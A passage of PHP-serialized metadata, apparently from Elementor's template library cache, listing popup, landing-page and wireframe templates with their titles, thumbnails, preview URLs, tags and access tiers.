screen\";s:4:\"tags\";s:16:\"[\"Login\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:145;a:19:{s:4:\"tmpl\";i:1268;s:2:\"id\";i:22307;s:5:\"title\";s:28:\"Classic | Login | Login Blog\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/login-blog-8.jpg\";s:12:\"tmpl_created\";i:1647339986;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-login-popup-login-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Blog\",\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:146;a:19:{s:4:\"tmpl\";i:1269;s:2:\"id\";i:22313;s:5:\"title\";s:31:\"Classic | Login | Login Fashion\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/login-fashion-9.jpg\";s:12:\"tmpl_created\";i:1647340204;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-login-popup-login-fashion/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Fashion\",\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:147;a:19:{s:4:\"tmpl\";i:1270;s:2:\"id\";i:22319;s:5:\"title\";s:40:\"Classic |  Login | Login Design Platform\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/03/login-design-platform-10.jpg\";s:12:\"tmpl_created\";i:1647340531;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:147:\"https://library.elementor.com/popups/classic-login-popup-login-design-platform/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"Design\",\"Login\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:148;a:19:{s:4:\"tmpl\";i:1271;s:2:\"id\";i:22325;s:5:\"title\";s:36:\"Fly-In | Contact | Digital Marketing\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-marketing-11.jpg\";s:12:\"tmpl_created\";i:1647340770;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/fly-in-contact-popup-digital-marketing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:51:\"[\"Business\",\"Contact\",\"Digital Agency\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:149;a:19:{s:4:\"tmpl\";i:1272;s:2:\"id\";i:22331;s:5:\"title\";s:36:\"Fly-In | CTA | Dog Cat Food Delivery\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/dog-cat-food-delivery-5.jpg\";s:12:\"tmpl_created\";i:1647341069;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:144:\"https://library.elementor.com/popups/fly-in-cta-popup-dog-cat-food-delivery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:33:\"[\"cta\",\"Delivery Service\",\"Pets\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:150;a:19:{s:4:\"tmpl\";i:1273;s:2:\"id\";i:22337;s:5:\"title\";s:37:\"Full Screen | Contact | Design Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/design-studio-12.jpg\";s:12:\"tmpl_created\";i:1647341370;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-contact-popup-design-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:39:\"[\"Business\",\"Contact\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:151;a:19:{s:4:\"tmpl\";i:1274;s:2:\"id\";i:22343;s:5:\"title\";s:44:\"Classic | Contact | Support Product Platform\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2022/03/support-13.jpg\";s:12:\"tmpl_created\";i:1647341972;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/classic-contact-support-product-platform/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Contact\",\"Support\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:152;a:19:{s:4:\"tmpl\";i:1275;s:2:\"id\";i:22371;s:5:\"title\";s:38:\"Full Screen | Contact | Small Business\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/small-business-14.jpg\";s:12:\"tmpl_created\";i:1647342508;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-contact-small-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:40:\"[\"Business\",\"Contact\",\"Interior Design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:153;a:19:{s:4:\"tmpl\";i:1276;s:2:\"id\";i:22377;s:5:\"title\";s:31:\"Classic | Contact | Online Shop\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/online-shop-15.jpg\";s:12:\"tmpl_created\";i:1647352786;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-contact-online-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:154;a:19:{s:4:\"tmpl\";i:1277;s:2:\"id\";i:22383;s:5:\"title\";s:40:\"Classic | Booking | Children Optometrist\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/children-optometrist-16.jpg\";s:12:\"tmpl_created\";i:1647352963;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-booking-children-optometrist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:53:\"[\"Booking\",\"Business\",\"Contact\",\"Education\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:155;a:19:{s:4:\"tmpl\";i:1278;s:2:\"id\";i:22389;s:5:\"title\";s:28:\"Fly-In | Contact | Open Week\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2022/03/open-week17.jpg\";s:12:\"tmpl_created\";i:1647353281;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-contact-open-week/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:34:\"[\"Business\",\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:156;a:19:{s:4:\"tmpl\";i:1279;s:2:\"id\";i:22397;s:5:\"title\";s:43:\"Full Screen | CTA | Plant Pots Online Store\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/plant-pots-online-store-18.jpg\";s:12:\"tmpl_created\";i:1647353429;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/full-screen-cta-plant-pots-online-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:33:\"[\"Ecommerce\",\"Marketing\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:157;a:19:{s:4:\"tmpl\";i:1054;s:2:\"id\";i:15414;s:5:\"title\";s:32:\"Classic | Contact | Dance Studio\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/10/PopUp.jpg\";s:12:\"tmpl_created\";i:1603180596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-contact-dance-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:762;s:11:\"trend_index\";i:650;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:158;a:19:{s:4:\"tmpl\";i:1398;s:2:\"id\";i:23687;s:5:\"title\";s:32:\"Pizza Promotion &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/48-Pizza-Promotion.jpg\";s:12:\"tmpl_created\";i:1649670575;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/pizza-promotion-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:92:\"[\"Business\",\"Cooking\",\"Delivery\",\"Discount\",\"Fast Food\",\"Food\",\"Landing Pages\",\"Restaurant\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:159;a:19:{s:4:\"tmpl\";i:1400;s:2:\"id\";i:23751;s:5:\"title\";s:33:\"Baby Sleep Webinar &#8211; Events\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/63-Baby-Sleep-Webinar.jpg\";s:12:\"tmpl_created\";i:1649676065;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/baby-sleep-webinar-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:227:\"[\"Baby\",\"Booking\",\"Business\",\"Children\",\"Course Online\",\"Education\",\"Events\",\"Health\",\"Landing Pages\",\"Life Coach\",\"Lifestyle\",\"Online Event\",\"Online Service\",\"Parenting\",\"Professional\",\"Remote\",\"Services\",\"Training\",\"Webinar\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:160;a:19:{s:4:\"tmpl\";i:1401;s:2:\"id\";i:23776;s:5:\"title\";s:34:\"Ski Hotel Promotion &#8211; Travel\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/04/64-Ski-Hotel-Promotion.jpg\";s:12:\"tmpl_created\";i:1649691720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/ski-hotel-promotion-travel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Travel\";s:4:\"tags\";s:118:\"[\"Accommodation\",\"Booking\",\"Discount. Landing Pages\",\"Lifestyle\",\"Luxury\",\"Services\",\"Spa\",\"Travel\",\"Trip\",\"Vacation\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:161;a:19:{s:4:\"tmpl\";i:1402;s:2:\"id\";i:23804;s:5:\"title\";s:30:\"Cake Delivery &#8211; Business\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/04/67-Cake-Delivery.jpg\";s:12:\"tmpl_created\";i:1649692909;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/cake-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:101:\"[\"Bakery\",\"Business\",\"Cake\",\"Cooking\",\"Delivery\",\"Discount\",\"Food\",\"Landing Pages\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:162;a:19:{s:4:\"tmpl\";i:1403;s:2:\"id\";i:23832;s:5:\"title\";s:32:\"Furniture Store &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/87-Furniture-Store.jpg\";s:12:\"tmpl_created\";i:1649694812;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/furniture-store-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:232:\"[\"Architecture\",\"Art\",\"Business\",\"Construction\",\"Coupon\",\"Creative\",\"Decor\",\"Designer\",\"Discount\",\"Fashion\",\"Furniture Design\",\"Home\",\"House\",\"Interior Design\",\"Landing Pages\",\"Lifestyle\",\"Products\",\"Professional\",\"Services\",\"Shop\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:163;a:19:{s:4:\"tmpl\";i:1404;s:2:\"id\";i:23746;s:5:\"title\";s:22:\"Nails &#8211; Business\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2022/04/62-Nails-1.jpg\";s:12:\"tmpl_created\";i:1649704635;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/lp/nails-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:173:\"[\"Art\",\"Beauty\",\"Business\",\"Colorful\",\"Cosmetics\",\"Creative\",\"Design\",\"Discount\",\"Fashion\",\"Girly\",\"Landing Pages\",\"Lifestyle\",\"Manicure\",\"Modern\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:164;a:19:{s:4:\"tmpl\";i:1405;s:2:\"id\";i:23846;s:5:\"title\";s:29:\"Music Festival &#8211; Events\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/04/88-Music-Festival.jpg\";s:12:\"tmpl_created\";i:1649707763;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/music-festival-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:128:\"[\"Author\",\"Booking\",\"Business\",\"Creative\",\"Discount\",\"Events\",\"Landing Pages\",\"Music\",\"Online\",\"Online Event\",\"Party\",\"Virtual\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:165;a:19:{s:4:\"tmpl\";i:1406;s:2:\"id\";i:23872;s:5:\"title\";s:40:\"Fashion Styling Course &#8211; Education\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/89-Fashion-Styling-Course.jpg\";s:12:\"tmpl_created\";i:1649708569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/fashion-styling-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:173:\"[\"Aesthetic\",\"Art\",\"Beauty\",\"Business\",\"Course Online\",\"Creative\",\"Discount\",\"Education\",\"Fashion\",\"Landing Pages\",\"Lifestyle\",\"Online\",\"Online Service\",\"Stylist\",\"Virtual\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:166;a:19:{s:4:\"tmpl\";i:1407;s:2:\"id\";i:23897;s:5:\"title\";s:33:\"Bags Online Shop &#8211; Business\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/04/90-Bags-Online-Shop.jpg\";s:12:\"tmpl_created\";i:1649709513;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/bags-online-shop-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:170:\"[\"Art\",\"Bag\",\"Business\",\"Creative\",\"Design\",\"Discount\",\"Fashion\",\"Landing Pages\",\"Lifestyle\",\"Luxury\",\"Modern\",\"Online\",\"Online Shop\",\"Products\",\"Sales\",\"Shop\",\"Stylist\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:167;a:19:{s:4:\"tmpl\";i:1408;s:2:\"id\";i:23932;s:5:\"title\";s:32:\"Cooking Academy &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/91-Cooking-Academy.jpg\";s:12:\"tmpl_created\";i:1649710216;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/cooking-academy-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:145:\"[\"Academy\",\"Booking\",\"Business\",\"Chef\",\"Cooking\",\"Education\",\"Food\",\"Free Trial\",\"Landing Pages\",\"Professional\",\"School\",\"Teacher\",\"Testimonial\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:168;a:19:{s:4:\"tmpl\";i:1409;s:2:\"id\";i:23970;s:5:\"title\";s:45:\"Ophthalmology Medical Clinic &#8211; Business\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/04/92-Ophthalmology-Medical-Clinic.jpg\";s:12:\"tmpl_created\";i:1649711096;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/ophthalmology-medical-clinic-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:165:\"[\"About\",\"Business\",\"Care\",\"Consulting\",\"Eye\",\"Free Trial\",\"Glasses\",\"Health\",\"Landing Pages\",\"Lifestyle\",\"Medical\",\"Modern\",\"Optometrist\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:169;a:19:{s:4:\"tmpl\";i:1425;s:2:\"id\";i:24331;s:5:\"title\";s:24:\"Wireframe &#8211; Home 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-1.jpg\";s:12:\"tmpl_created\";i:1653988363;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:170;a:19:{s:4:\"tmpl\";i:1218;s:2:\"id\";i:20792;s:5:\"title\";s:26:\"Luxury Car &#8211; Product\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/11/250x280-1.jpg\";s:12:\"tmpl_created\";i:1636903770;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/lp/luxury-car-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:54:\"[\"car\",\"Ecommerce\",\"Landing Pages\",\"Luxury\",\"Product\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:171;a:19:{s:4:\"tmpl\";i:1428;s:2:\"id\";i:24398;s:5:\"title\";s:25:\"Wireframe &#8211; About 1\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-1.jpg\";s:12:\"tmpl_created\";i:1653988534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:83:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Professional\",\"Services\",\"Team\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:172;a:19:{s:4:\"tmpl\";i:991;s:2:\"id\";i:13413;s:5:\"title\";s:33:\"Classic | Contact | Online 